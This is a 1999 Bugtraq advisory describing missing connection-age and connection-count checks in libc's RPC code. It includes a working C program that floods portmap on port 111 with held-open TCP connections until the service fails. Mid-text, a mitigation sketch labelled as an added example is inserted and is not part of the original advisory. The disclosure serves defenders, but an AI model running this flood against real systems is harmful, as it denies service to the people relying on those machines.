[10218] in bugtraq
KKIS.08041999.001.b - security raport - flaws in rpc part of libc
daemon@ATHENA.MIT.EDU (Lukasz Luzar)
Thu Apr 15 13:24:11 1999
Date: Wed, 14 Apr 1999 15:26:14 +0200
Reply-To: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
To: BUGTRAQ@NETSPACE.ORG
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###
S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team Cracow Commercial Internet, Poland
http://www.security.kki.pl http://www.kki.pl
mailto:security@security.kki.pl mailto:biuro@kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Report title : Flaws in the RPC implementation of libc libraries
and how they affect, for example, portmap.
Problem found by : Lukasz Luzar (lluzar@security.kki.pl)
Report created by : Robert Pajak (shadow@security.kki.pl)
Lukasz Luzar (lluzar@security.kki.pl)
Problem found at : 08 April 1999
Report published : 14 April 1999
Report code : KKIS.08041999.001.b
Short description : full description below
Vulnerable versions : libc*, up to current.
Platforms affected : Linux X.X, FreeBSD X.X, probably others...
Patches : currently not available
Archive : http://www.security.kki.pl/advisories/
Impact description : full description below
Risk level : medium
Notes : we were unable to contact the authors of libc
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
It seems that libc's RPC implementation checks neither the age of
established connections nor the number of connected sockets.
This is quite dangerous, because many network services are based on
these functions.
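The two checks the description says are missing, sketched as an added example (not code from the advisory or from any libc): a server-side connection table that evicts idle sockets and caps the number of sockets one source address may hold. The limits, the table size and the dotted-quad peer field are assumptions.

```c
/* Admission policy the advisory says libc's RPC server side lacks: idle
 * eviction plus a per-source cap. Added example, not KKI's code; the
 * limits and the 16-byte peer field are constructed assumptions. */
#include <stddef.h>
#include <string.h>
#include <time.h>
#define IDLE_TIMEOUT 30   /* seconds of silence before eviction (assumed) */
#define PER_PEER_MAX 8    /* open sockets allowed per source address (assumed) */
#define TABLE_SIZE   64
struct conn { int fd; char peer[16]; time_t last_activity; }; /* fd == -1: free slot */

/* Mark every connection idle longer than IDLE_TIMEOUT as free; return how many. */
int evict_idle(struct conn *tab, size_t n, time_t now)
{
    int evicted = 0;
    for (size_t i = 0; i < n; i++)
        if (tab[i].fd >= 0 && now - tab[i].last_activity > IDLE_TIMEOUT) {
            tab[i].fd = -1;   /* a real server would close(fd) here */
            evicted++;
        }
    return evicted;
}

/* Live connections currently held by one source address. */
int peer_count(const struct conn *tab, size_t n, const char *peer)
{
    int c = 0;
    for (size_t i = 0; i < n; i++)
        if (tab[i].fd >= 0 && strcmp(tab[i].peer, peer) == 0)
            c++;
    return c;
}

/* Decide on a freshly accepted socket: 1 = keep it, 0 = refuse it.
 * Refusing early keeps one client from consuming every descriptor. */
int admit(struct conn *tab, size_t n, int fd, const char *peer, time_t now)
{
    evict_idle(tab, n, now);
    if (peer_count(tab, n, peer) >= PER_PEER_MAX)
        return 0;
    for (size_t i = 0; i < n; i++)
        if (tab[i].fd < 0) {
            tab[i].fd = fd;
            strncpy(tab[i].peer, peer, sizeof tab[i].peer - 1);
            tab[i].peer[sizeof tab[i].peer - 1] = '\0';
            tab[i].last_activity = now;
            return 1;
        }
    return 0;   /* table full: refuse rather than run out of descriptors */
}
```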
~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Below is a program which shows how to perform a DoS of portmap (TCP).
When no maximum limit of descriptors per process is set (e.g. the
default settings on FreeBSD), this can easily lead to heavy problems
with the stability of the victim's machine.
When the limit of open descriptors is reached, portmap begins to refuse
all new connections.
~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
--- CUT HERE ---
/*
 * example.c by Lukasz Luzar (lluzar@security.kki.pl)
 *
 * Opens TCP connections to the victim service until the local process
 * runs out of descriptors or the remote side refuses, then holds them
 * open indefinitely.
 */
#include <stdio.h>
#include <string.h>
#include <strings.h>        /* bzero() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define ADDR "10.0.0.1"     /* victim's IP address in dot notation */
#define PORT 111            /* victim service to DoS, e.g. portmapper */

int main(void)
{
    int sockfd,
        n = 0;
    struct sockaddr_in victim_addr;

    bzero((char *) &victim_addr, sizeof(victim_addr));
    victim_addr.sin_family = AF_INET;
    victim_addr.sin_addr.s_addr = inet_addr(ADDR);
    victim_addr.sin_port = htons(PORT);

    fprintf(stdout, "Opening new connections...\n");
    for (;;) {
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            fprintf(stderr, "socket error at %d\n", n);  /* local descriptor limit hit */
            break;
        }
        if (connect(sockfd, (struct sockaddr *) &victim_addr,
                    sizeof(victim_addr)) < 0) {
            fprintf(stderr, "connect error at %d\n", n); /* remote side refused */
            break;
        }
        n++;
    }
    fprintf(stdout, "Established %d connections "
                    "and waiting...\n", n);
    for (;;);                 /* keep the sockets open indefinitely */
}
--- CUT HERE ---
~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.
All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~